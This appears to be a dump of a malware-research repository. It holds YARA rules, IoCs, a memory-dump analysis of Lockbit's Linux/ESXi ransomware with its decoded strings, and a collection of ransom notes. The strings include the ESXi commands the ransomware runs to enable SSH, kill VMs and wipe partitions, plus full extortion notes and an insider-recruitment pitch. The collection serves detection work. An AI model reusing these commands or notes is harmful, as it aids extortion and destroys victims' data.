CrVJEQphqnfuktTimIHQR0CqYOlUddBPJoV9l1fBJtItgkLjImkoOxqLERZcOgXi 220 | 6h83nCXPaDK2Ssj4nSTigjoyQ9HJpYZYVZoZpqtDh5K1OMSrREtB2Zu/Np47dl+6 221 | eDNfnUidpzLa0bGZotyy8086DtmizjIGo5JZ89MjqHZLQH4iX2oSuV01MW2tCUwM 222 | RkQ2WEKzDYCR2J+ZYKXzDQkZAXmqdDFTp6OGa/HQy2XMBmIy2aFyrDTW1vuXJbK7 223 | uL0wYR48pW/1N7MaC6QWjag/Nb5i4eRQOcFTIiiG/UueH+3sbr5okE12hpDYZ1vC 224 | uN4VWj1Ljh/Y4Jv8R7kBDQRcyqnbAQgAodQaV4rcRfEKjAqy5CXXnqN40J9fYDD+ 225 | 9Tz0j3qQhRUb9Q22n7zXll+869+m4fkiSohYA5FOfeAfG5n3TPk37GJs0MlzTNB/ 226 | FpkElXFVZgDtV/E/VmEqK+2lYCFyVkw/RJczUqRC+vhRU8TLWeEdEAhYQ0P/N6dl 227 | u8I+jsDl5U+fUQm0KuIS+qOfRuoiocs2YKQYq7rIW8i07iCYTDpKeImnwrvVy9Zt 228 | M0Op6j6RGQgAzMqI5DDTRBxkpTK+E80K14BcaQ9l2Ql9BfonJoxFXEEQ44RhfTUj 229 | 90kaAKAcueGvx81E91SPkr3brvk8/gwOkQ1rdY905I9E/9uyt6WNoQARAQABiQE2 230 | BBgBCAAgFiEEK0PX/7RtDECqmQX4CixyEGMJDEIFAlzKqdsCGwwACgkQCixyEGMJ 231 | DEJgEQgAwYi25R5JDTbgrdas6JIZE5tPvHf+CydiAEmDq22zXehiiw3wU3W0iLMs 232 | 7Dy+yj5q0dC+Pfhzgq10Pz/Td7OtrrKzvg5rS9EBLHv0hs0t2RuuSRfM62P/fCXi 233 | VLQh08B5sC8eRIMQzYfRWzsOfN5BEzj1gOtsOBE04f9hTFZ/N7K6Gx4q428qGmgC 234 | 12q8/tc7wcsiHX1lEB6JDekDT5IdJcwoxs2t87J1Z3xlIvgpSsAPzNpG4nRQtCVW 235 | uvuaCpWfdSElTLR4s+4TM/qUxpslNA+DP0eelxxD8RQcsDK86A6FLo/f7jsuGrL4 236 | jIxAezZQinBjO0XTmJ+az+O00taMzw== 237 | =nrqZ 238 | -----END PGP PUBLIC KEY BLOCK----- 239 | ``` 240 | 241 | ```pgp 242 | -----BEGIN PGP PUBLIC KEY BLOCK----- 243 | mQENBFyf7BEBCAC3g5OV6UoyNHtnSBPMaIJ26yIqamQ9CAloQpQ1oSfXEqPcyA7g 244 | aO59x/8zDx4PjiDHJ8/4XUM7ac89ltCP6Or9NUMkpXmidBbHWCQCkMZf81nVWoZ5 245 | 1l1ZIyM+vJd4JM84vSXF07j+b0K2/3Kwx1K8g4Y2Qqb0D6tEdONTAOkcqtDud9Zz 246 | MMZ9LCEHjae3eK+gb+Jh212FI8wE9lXaE1smqn4eBkrcFw2ERYAyeCs1adcE58T5 247 | vuaTmXENduZagrXVtCPK8SU4fZqNclQdBThfigIkBoWgxiIVbR6lDSyVgXKzy3te 248 | 8lXxiDFodYw4DQzoipqpEvaCM1G5JCrgxQATABEBAAG0FGJmaGppcHN3b25sZHZ1 249 | ZXRna3JtiQFUBBMBCAA+FiEEm3aObQRnB968nKMYU0780NYNOE0FAlyf7BECGwMF 250 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQU0780NYNOE3IdQgAh7l4 251 | NmPg7RZf4cqF36nZXQtxoNh08mQ6RrNn/ADQrgzgMP9K25jNYxqmVHrkQYzXUhRO 252 | KMeBSncvRfAF0KHRsMNgSwG7tAV/k+otVw6i5Q3A6MpN12DZ6PXMIDn26FArUn5B 253 | iQywi29i1jd0GPLLYQRMVGDhr8PO+zRM/mSUDLyRY2/yK1fMpaIko8xTHhsEuh1D 254 | n6W/qU8xpP6UtcZeclNrAhqHup7l1MkJ9jSrI4qTrhNGqj3vSKcKcU0TgD21pejz 255 | 7KBHSVPccbj1S/rtQFt+sWK/EKSA26eutzGv2840Ft/ajArNrpYR5pZFJy+MLl1b 256 | w3Jsmcf19NQf9X77DbkBDQRcn+wRAQgAwYeSIuSv3MsMIZbwre4wzgA0ycPrWULV 257 | ZQFCzqh7+A12rLM6Ln6x2MakQZf/tUBW1vFHFn8EKXL9WJXlmFQ1slEy0gAG5RPT 258 | 4yrAkHCArXiQZTtzqcfT/X0gIyQyUVUPK9GcnTGpppwSzNfdGBRwUAZFGv+0SBUM 259 | drQvZ+gNDEGzW/dcPcOqVUhNG71PMtH1MVEzDuCHadPLLzTonK3sflNde2rFtW5e 260 | Vq6X21kyu+lVxNiXsPvqB15qYbmqW8OhuWDrP5m6ZCPo7hApQiyK5990G2RqdoD9 261 | U6xW4PmDDzT5FuxeCZ8I8zE0kMLvYUl5w4k87AX6lSe9hn05QMEQowARAQABiQE2 262 | BBgBCAAgFiEEm3aObQRnB968nKMYU0780NYNOE0FAlyf7BECGwwACgkQU0780NYN 263 | OE2LPQf/WlGZgin6CVYSAHrhB9LWK+lgmrufk8Ju39Q7fTSwVqFZCK7d21rwh+9J 264 | TRBlmy5u7Zj+mkgVBwv6V+Qy5d03OSxxIi658v1w6n4guneYfabUWGvUhnVH5s73 265 | R6gwh9b22qgfv6StbqL0kMT77TCcNVyCuD80r7J0INW7YsdFDB2LmrTTHO6yFMWT 266 | JITMt82UWw9AgRAwn/7uXzErcUAvu5TffjC5b25VQNmRLZqgL3kC3j+XgFevvJC8 267 | wnzm/yfaG3IYdQWYJSstW+PeUiHN42fq45QG9QzdauVJqQwIH96ilJZVbFrXf2b1 268 | tbBY6O1dizLZOJGfSFDRQ+VcN7/qBw== 269 | =PEdT 270 | -----END PGP PUBLIC KEY BLOCK----- 271 | ``` 272 | 273 | ## Yara rules 274 | ```yara 275 | rule snatch_caro 276 | { 277 | condition: 278 | new_file and ((signatures matches /.*Snatch.*/) or (signatures matches /.*Ransom.*Gocoder.*/)) 279 | } 280 | ``` 281 | 282 | ```yara 283 | import "cuckoo" 284 | rule snatch_service 285 | { 286 | condition: 287 | cuckoo.registry.key_access(/\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 288 | or 289 | cuckoo.registry.key_access(/HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 290 | or 291 | cuckoo.registry.key_access(/HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 292 | } 293 | ``` 294 | 295 | ## Ransom note 296 | ``` 297 | Your all your files are encrypted and only I can decrypt them. 298 | Contact me: 299 | doctor666@mail.fr or doctor666@cock.li 300 | Write me if you want to return your files - I can do it very quickly 301 | The header of the letter must contain the extension of the encryptor. 302 | Attention 303 | Do not rename encrypted files. You may have permanent data loss. 304 | To prove that I can recover your files, I am ready to decrypt any three files (less than 1Mb) for free (except databases, Excel and backups) 305 | hurry up 306 | If you do not email me in the next 48 hours then your data may be lost permanently 307 | ``` 308 | -------------------------------------------------------------------------------- /Ransomware-Linux-Lockbit/README.md: -------------------------------------------------------------------------------- 1 | # Dumping plain-text strings from the Linux-ESXi variant of Lockbit ransomware 2 | 3 | ## Discovered by Trend Micro 4 | ```Bash 5 | https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 6 | ``` 7 | 8 | ## SHA256 9 | ```Bash 10 | f3a1576837ed56bcf79ff486aadf36e78d624853e9409ec1823a6f46fd0143ea 11 | 67df6effa1d1d0690c0a7580598f6d05057c99014fcbfe9c225faae59b9a3224 12 | ee3e03f4510a1a325a06a17060a89da7ae5f9b805e4fe3a8c78327b9ecae84df 13 | ``` 14 | 15 | ## Executing the ransomware 16 | ```Bash 17 | sandworm@arrakis:~$ sudo ./lockbit3 18 | ``` 19 | 20 | Generally, the process will hang on read(). Tried to debug it in gdb. 21 | ```GDB 22 | (No debugging symbols found in /lib64/ld-linux-x86-64.so.2) 23 | 0x00007f15f11b9142 in __GI___libc_read (fd=0, buf=0x20b72e0, nbytes=1024) 24 | at .. /sysdeps/unix/sysv/linux/read.c:26 25 | 26 ../sysdeps/unix/sysv/linux/read.c: No such file or directory. 26 | ``` 27 | 28 | Added a bunch of deb-src repos to my /etc/apt/sources.list to apt source glibc/libc6. However that does not solve the issue. 29 | If you try to strace the process, will fail due to having two ptrace functions inside. 30 | ```Bash 31 | getppid() = 15885 32 | ptrace(PTRACE_ATTACH, 15885 33 | ``` 34 | 35 | Tried to circumvent this via: 36 | ```Bash 37 | /etc/sysctl.d/10-ptrace.conf: 38 | kernel.yama.ptrace_scope = 0 39 | ``` 40 | 41 | And via: 42 | ```Bash 43 | echo "0" | sudo tee /proc/sys/kernel/yama/ptrace_scope 44 | ``` 45 | 46 | No luck. 47 | The ptrace calls can be patched from the binary, but then the process will still hang on read(). 48 | Same results on both ESXi and Ubuntu images. 49 | Went down the rabbit hole of differint glibc/libc6 version as a cause. 50 | 51 | ```Bash 52 | sandworm@arrakis:~$ strings lockbit3 | grep -i libc 53 | libc.so.6 54 | GLIBC_2.2.5 55 | GLIBC_2.3.2 56 | GLIBC_2.3 57 | GLIBC_2.4 58 | GLIBC_2.3.4 59 | ``` 60 | 61 | My current image: 62 | ```Bash 63 | sandworm@arrakis:~$ ldd --version ldd 64 | ldd (Ubuntu GLIBC 2.31-0ubuntu3) 2.31 65 | ``` 66 | 67 | ```Bash 68 | sandworm@arrakis:~$ strings lockbit3 | grep -i libc 69 | String dump of section '.comment': 70 | [ 0] GCC: (GNU) 4.4.7 20120313 (Red Hat 4.4.7-23) 71 | ``` 72 | 73 | No conclusion. 74 | Going to try other kernels with different glibc versions later on. 75 | 76 | ## Continuing and finding corresponding PID of the hanging process 77 | ```Java 78 | sandworm@arrakis:/tmp$ ps aux | grep -i lockb 79 | root 15884 0.0 0.1 23440 4788 pts/0 t+ 09:44 0:00 sudo ./lockbit3 -i 80 | root 15885 0.0 0.0 2888 952 pts/0 S+ 09:44 0:00 ./lockbit3 -i 81 | ``` 82 | 83 | ## Finding related memory regions 84 | ```Go 85 | sandworm@arrakis:/tmp$ sudo cat /proc/15885/maps 86 | 00400000-0043c000 r-xp 00000000 08:05 264340 /tmp/lockbit3 87 | 0063b000-0063c000 r--p 0003b000 08:05 264340 /tmp/lockbit3 88 | 0063c000-00640000 rw-p 0003c000 08:05 264340 /tmp/lockbit3 89 | 0121b000-0123c000 rw-p 00000000 00:00 0 [heap] 90 | ``` 91 | 92 | ## Dumping the memory section via gdb 93 | ```YAML 94 | sandworm@arrakis:/tmp$ sudo gdb --pid 15885 95 | GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2 96 | (gdb) dump memory /tmp/lockbit_memdump 0x0063c000 0x00640000 97 | ``` 98 | 99 | ## XOR key 100 | ```YAML 101 | 0x39 102 | ``` 103 | 104 | ## Plain-text strings 105 | ```JSON 106 | [+] file %s decrypted. 107 | [-] file %s not decrypted. 108 | /tmp/ 109 | locklog 110 | .llg 111 | lwndotfyrm:i:b:e:s:p:a:z: 112 | Usage: %s [OPTION]... -i '/path/to/crypt' 113 | Recursively crypts files in a path or by extention. 114 | Mandatory arguments to long options are mandatory for short options too. 115 | -i, --indir path to crypt 116 | -m, --minfile minimal size of a crypted file, no less than 4096 117 | -r, --remove self remove this file after work 118 | -l, --log prints the log to the console 119 | -n, --nolog do not print the log to the file /tmp/locker.log 120 | -d, --daemonize runs a program as Unix daemon 121 | -w, --wholefile encrypts whole file 122 | -b, --beginfile encrypts first N bytes 123 | -e, --extentions encrypts files by extentions 124 | -o, --nostop prevent to stop working VM 125 | -t, --wipe wipe free space 126 | -s, --spot upper bound limitation value of spot in Mb 127 | -p, --pass password 128 | -f, --full full log 129 | -a, --delay start delay in minutes 130 | -y, --noexts do not search for extentions 131 | !!!-Restore-My-Files-!!! 132 | ~~~ LockBit 2.0 the world's fastest ransomware since 2019~~~ 133 | >>>> Your data are stolen and encrypted 134 | The data will be published on TOR website if you do not pay the ransom 135 | Links for Tor Browser: 136 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 137 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 138 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 139 | Links for the normal browser 140 | https://lockbitapt.uz 141 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 142 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 143 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 144 | >>>> What guarantees that we will not deceive you? 145 | We are not a politically motivated group and we do not need anything other than your money. 146 | 147 | If you pay, we will provide you the programs for decryption and we will delete your data. 148 | Life is too short to be sad. Be not sad, money, it is only paper. 149 | 150 | If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. 151 | Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. 152 | 153 | You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live 154 | 155 | >>>> You need contact us and decrypt one file for free on these TOR sites with your personal decryption ID 156 | Download and install TOR Browser https://www.torproject.org/ 157 | Write to a chat and wait for the answer, we will always answer you. 158 | Sometimes you will need to wait for our answer because we attack many companies. 159 | Links for Tor Browser: 160 | http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion 161 | http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion 162 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 163 | http://lockbitsapfq6mp7djlmbtk4uj53vnueldrjsgfjew3ccridkufmmmyd.onion 164 | http://lockbitsapliyedzmz5yjcoj27yfgeix6rzrhj7ss4kvfmdv6iyvxlad.onion 165 | http://lockbitsapu34zkhnafamvkegbmdfh5yvqjbth6g376z2tgvef34jnqd.onion 166 | http://lockbitsapzxzkpf33daeacsarqdtjjlkouxd7emxaqk7f3svavbmmad.onion 167 | Link for the normal browser 168 | https://lockbitsupp.uz 169 | If you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox. 170 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 171 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 172 | >>>> Your personal decryption ID: 173 | >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! 174 | >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! 175 | >>>> Advertisement 176 | Would you like to earn millions of dollars $$$ ? 177 | Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. 178 | You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. 179 | Open our letter at your email. Launch the provided virus on any computer in your company. 180 | You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. 181 | Companies pay us the foreclosure for the decryption of files and prevention of data leak. 182 | You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. 183 | Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. 184 | If you want to contact us, write in jabber or tox. 185 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 186 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 187 | If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser 188 | Links for Tor Browser: 189 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 190 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 191 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 192 | Links for the normal browser 193 | https://lockbitapt.uz 194 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 195 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 196 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 197 | vm-support --listvms 198 | /bin/vim-cmd hostsvc/enable_ssh 199 | [+] ESXi: enable_ssh 200 | [-] ESXi: enable_ssh 201 | /sbin/vmdumper -l 202 | /sbin/vmdumper %d suspend_vm 203 | [+] Suspended VM ID %d 204 | [-] Suspend VM ID %d ERROR %d. Trying %d... 205 | /tmp/locker.pid 206 | /home 207 | /var/log 208 | %H:%M:%S 209 | [%s][%lu][+] End file %s size %lu time %lu is encrypted. Checksum after encryption %lu 210 | [%s][%lu][-] End file %s remained intact. 211 | [%s][%lu][?] File %s need ram %d 212 | [%s][%lu][-] File %s MMAP ERROR %d 213 | [%s][%lu][?] Free ram %d, need ram %d 214 | [%s][%lu][+] Start encrypting file %s spot %d from %d. Original checksum %lu 215 | [%s][%lu][+] Encrypting file %s... 216 | vmdk 217 | vswp 218 | lockbit 219 | [%s][%lu][+] Start encrypting file %s. Original checksum %lu 220 | [%s][%lu][+] Start encrypting file %s 221 | [%s][%lu][+] Encrypting file %s... 222 | /bin/vm-support 223 | /sbin/vm-support 224 | /bin/ 225 | /sbin/ 226 | /sbin/vmdumper 227 | /bin/vim-cmd 228 | [%s][%lu][+] Encrypt entry %s 229 | %02X 230 | /**/* 231 | %s/%s 232 | %*s[%s] 233 | %*s- %s 234 | [%s][%lu][+] Add directory to encrypt: %s 235 | [-] glob ERROR %d 236 | remove 237 | minfile 238 | indir 239 | nolog 240 | WVJMVI9full 241 | wholefile 242 | beginfile 243 | daemonize 244 | extensions 245 | spot 246 | wipe 247 | pass 248 | delay 249 | repeat 250 | noexts 251 | [%s][%ul][+] ------------------Start searching for extentions------------------ 252 | [%s][%ul][+] Launch parameters: %s -i '%s' -m %d -w %d -b %d -r %d -l %d -n %d -d %d -e '%s' -s %d -p %s -o %d -t %d -f %d -a %d -z %d -y %d 253 | Date: %d/%m/%Y Time: %H:%M:%S 254 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 255 | uname -a: %s%s%s 256 | Processor: %s, %d cores 257 | Volumes in the system: 258 | Virtual machines for skipping: %s 259 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 260 | Total files..................%lu 261 | Total VMs....................%lu 262 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 263 | Encrypted files..............%lu 264 | Encrypted VMs................%lu 265 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 266 | Total encrypted size.........%lu Mb 267 | Time spent for encryption....%lu sec 268 | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 269 | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 270 | LockBit Linux/ESXi locker V: 1.2 271 | esxcli vm process kill --type 272 | force --world-id 273 | 3}VW 274 | _VK^\M 275 | ZU\XW 276 | @VLK 277 | NVKRJIXZ\ 278 | [%s][%lu][+] %s %d 279 | Suspended VM ID 280 | [%s][%lu][-] %s %d %s %d %s %d... 281 | ERROR 282 | Trying 283 | [%s][%lu][+] %s 284 | [%s][%lu][-] %s 285 | ESXi: enable_ssh 286 | Same process is running. Exit. 287 | kill -9 `ps 288 | grep %s 289 | cut -d' ' -f0` 290 | ps -ef 291 | grep '%s' 292 | grep -v grep 293 | awk '{print $2}' 294 | xargs -r kill -9 295 | vmware -v 296 | uname -a 297 | (Running) 298 | [%s][%lu][+] Wipe partition %s 299 | [%s][%lu][+] End wiping partition %s 300 | Start wiping all partitions. 301 | All partitions have been wiped. 302 | df -h 303 | displayName = " 304 | [%s][%lu][+] VM %s will be skipped. 305 | ~~~~~~~~~~~~~~~Hardware~~~~~~~~~~~~~~~~~~ 306 | lspci -vvv 307 | vim-cmd hostsvc/autostartmanager/enable_autostart false 308 | Disabled AutoStart 309 | There are %d processors in the system. 310 | esxcfg-scsidevs -l 311 | egrep -i 'display name 312 | vendor' 313 | Processor: %s, %d cores 314 | vim-cmd hostsvc/hostsummary 315 | grep cpuModel 316 | cut -d '"' -f2 317 | head -c -1 318 | esxcli storage filesystem list 319 | tail -n +3 320 | Enter password: 321 | ls -Ral / 322 | ls -alR /vmfs/ 323 | [%s][%lu][+] wipe error %d 324 | pciconf -lv 325 | /sbin/sysctl hw 326 | grep hw.model 327 | cut -d ':' -f2 328 | lscpu 329 | grep "Model name" 330 | cut -d ':' -f2 331 | egrep 'da[0-9] 332 | ad[0-9] 333 | cd[0-9]' /var/run/dmesg.boot 334 | lsblk -io KNAME,TYPE,SIZE,MODEL 335 | tail -n +2 336 | ps auxfww 337 | ps -TcJnN 338 | ps auxf 339 | /etc/rc.local 340 | /etc/ 341 | -i '%s' -m %d -b %d -e '%s' -s %d -p '%s' -a %d -z %d 342 | /etc/sudoers.d 343 | /usr/share 344 | a-bvmsyslogd 345 | !!!-Restore-My-Files-!!!,lockbit,locklog 346 | VMware vCenter,VMware-VirtualSAN-Witness 347 | rar,zip,7zip,txt,doc,jpg,png,mp3,vbm,vrb,vbk,vmdk,zip,msi,iso,tar,sql,vlb,vom,vsm,vsb,vab 348 | test 349 | ``` 350 | 351 | ## IoCs: 352 | ```YAML 353 | Strings: 354 | ~~~ LockBit 2.0 the world's fastest ransomware since 2019~~~ 355 | LockBit Linux/ESXi locker V: 1.2 356 | !!!-Restore-My-Files-!!! 357 | locklog 358 | 359 | Targets: 360 | VMware vCenter 361 | VMware-VirtualSAN-Witness 362 | 363 | Added extension: 364 | .llg 365 | 366 | Extension list: 367 | rar,zip,7zip,txt,doc,jpg,png,mp3,vbm,vrb,vbk,vmdk,zip,msi,iso,tar,sql,vlb,vom,vsm,vsb,vab 368 | 369 | PID file: 370 | /tmp/locker.pid 371 | 372 | Web: 373 | https://lockbitapt.uz 374 | http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion 375 | http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion 376 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 377 | http://lockbitsapfq6mp7djlmbtk4uj53vnueldrjsgfjew3ccridkufmmmyd.onion 378 | http://lockbitsapliyedzmz5yjcoj27yfgeix6rzrhj7ss4kvfmdv6iyvxlad.onion 379 | http://lockbitsapu34zkhnafamvkegbmdfh5yvqjbth6g376z2tgvef34jnqd.onion 380 | http://lockbitsapzxzkpf33daeacsarqdtjjlkouxd7emxaqk7f3svavbmmad.onion 381 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 382 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 383 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 384 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 385 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 386 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 387 | 388 | Tox ID LockBitSupp: 389 | 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 390 | 391 | XMPP (Jabber) Support: 392 | 598954663666452@exploit.im 393 | 365473292355268@thesecure.biz 394 | ``` 395 | 396 | ## YARA 397 | ```C++ 398 | rule Lockbit_Linux_ESXi_memory_strings 399 | { 400 | meta: 401 | author = "Albert Zsigovits" 402 | url = "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Linux-Lockbit" 403 | strings: 404 | $str1 = " -e, --extentions encrypts files by extentions" ascii wide 405 | $str2 = "!!!-Restore-My-Files-!!!" ascii wide 406 | $str3 = "VMware vCenter,VMware-VirtualSAN-Witness" ascii wide 407 | $str4 = "/tmp/locker.pid" ascii wide 408 | $str5 = "locklog" ascii wide 409 | condition: 410 | 3 of them 411 | } 412 | ``` 413 | 414 | ```C++ 415 | rule Lockbit_Linux_ESXi_XOR_function 416 | { 417 | meta: 418 | author = "Albert Zsigovits" 419 | url = "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Linux-Lockbit" 420 | strings: 421 | $xor = { 0F B6 05 ?? ?? 23 00 BA ?? ?? 63 00 ?? ?? 40 00 89 C1 32 0A 88 0A 48 83 C2 01 84 C9 75 F2 } 422 | condition: 423 | $xor 424 | } -------------------------------------------------------------------------------- /Ransomware/_ransom_notes.md: -------------------------------------------------------------------------------- 1 | # ransomware-notes 2 | Ransom notes of different ransomware families 3 | 4 | ## Afrodita 5 | ``` 6 | ~~~ Greetings ~~~ 7 | [+] What has happened? [+] 8 | Your files are encrypted, and currently unavailable. You are free to check. 9 | Every file is recoverable by following our instructions below. 10 | Encryption algorithms used: AES256(CBC) + RSA2048 (military/government grade). 11 | [+] Guarantees? [+] 12 | This is our daily job. We are not here to lie to you - as you are 1 of 10000's. 13 | Our only interest is in us getting payed and you getting your files back. 14 | If we were not able to decrypt the data, other people in same situation as you 15 | wouldn't trust us and that would be bad for our buissness -- 16 | So it's not in our interest. 17 | To prove our ability to decrypt your data you have 1 file free decryption. 18 | If you don't want to pay the fee for bringing files back that's okey, 19 | but remeber that you will lose a lot of time - and time is money. 20 | Don't waste your time and money trying to recover files using some file 21 | recovery "experts", we have your private key - only we can get the files back. 22 | With our service you can go back to original state in less then 30 minutes. 23 | [+] Service [+] 24 | If you decided to use our service please follow instructions below. 25 | Contact us: 26 | email address: afroditasupport@mail2tor.com, put in cc: afroditasupport@firemail.cc 27 | ``` 28 | 29 | ## Antefrigus 30 | ``` 31 | $$$$ $$ $$ $$$$$$ $$$$$ $$$$$$ $$$$$ $$$$$$ $$$$ $$ $$ $$$$ 32 | $$ $$ $$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 33 | $$$$$$ $$ $$$ $$ $$$$ $$$$ $$$$$ $$ $$ $$$ $$ $$ $$$$ 34 | $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 35 | $$ $$ $$ $$ $$ $$$$$ $$ $$ $$ $$$$$$ $$$$ $$$$ $$$$ 36 | 37 | [+] Whats Happen ? [+] 38 | Your files are encrypted, and currently unavailable.You can check it : all files on you computer has expansion hssjyh. 39 | By the way, everything is possible to recover(restore), but you need to follow our instructions.Otherwise, you cant return your data(NEVER). 40 | [+] What guarantees ? [+] 41 | Its just a business.We absolutely do not care about youand your deals, except getting benefits.If we do not do our workand liabilities - nobody will not cooperate with us.Its not in our interests. 42 | To check the ability of returning files, You should go to our website.There you can decrypt one file for free.That is our guarantee. 43 | If you will not cooperate with our service - for us, its does not matter.But you will lose your timeand data, cause just we have the private key.In practise - time is much more valuable than money. 44 | [+] How to get access on website ? [+] 45 | You have two ways : 46 | 1)[Recommended] Using a TOR browser! 47 | a) Download and install TOR browser from this site: https://torproject.org/ 48 | b) Open our website : http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh 49 | (If you can’t follow the link or other difficulty write to the technical support email : antefrigus@cock.li) 50 | 2) If TOR blocked in your country, try to use VPN! For this: 51 | a) Open any browser (Chrome, Firefox, Opera, IE, Edge) and download and install free VPN programm and download TOR browser from this site https://torproject.org/ 52 | b) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you. 53 | When you open our website, put the following data in the input form: 54 | Key: 55 | 56 | Extension name : 57 | hssjyh 58 | ---------------------------------------------------------------------------------------- - 59 | !!!DANGER !!! 60 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private keyand, as result, The Loss all data. 61 | !!!!!!!!! 62 | ONE MORE TIME : Its in your interests to get your files back.From our side, we(the best specialists) make everything for restoring, but please should not interfere. 63 | !!!!!!!!! 64 | ``` 65 | 66 | ## Bitpaymer 67 | ``` 68 | Hello %Company_name% 69 | Your network was hacked and encrypted. 70 | No free decryption software is available on the web. 71 | E-mail us at %e-mail% to get the ransom amount. 72 | Keep our contacts safe. Disclosure can lead to impossibility of decryption. 73 | Please, use your company name as the email subject. 74 | TAIL: %base64% 75 | KEY: %base64% 76 | ``` 77 | 78 | ## Buran 79 | Filename: `!!! YOUR FILES ARE ENCRYPTED !!!.TXT` 80 | ``` 81 | All your files, documents, photos, databases and other important 82 | files are encrypted. 83 | 84 | You are not able to decrypt it by yourself! The only method 85 | of recovering files is to purchase an unique private key. 86 | Only we can give you this key and only we can recover your files. 87 | 88 | To be sure we have the decryptor and it works you can send an 89 | email unique10@protonmail.com or realtime5@protonmail.com and decrypt one file for free. But this 90 | file should be of not valuable! 91 | 92 | Do you really want to restore your files? 93 | Write to email unique10@protonmail.com or realtime5@protonmail.com 94 | 95 | 96 | Your personal ID: 0A123BC4-56DE-78FF-9E01-23ABC256F34E 97 | 98 | Attention! 99 | * Do not rename encrypted files. 100 | * Do not try to decrypt your data using third party software, 101 | it may cause permanent data loss. 102 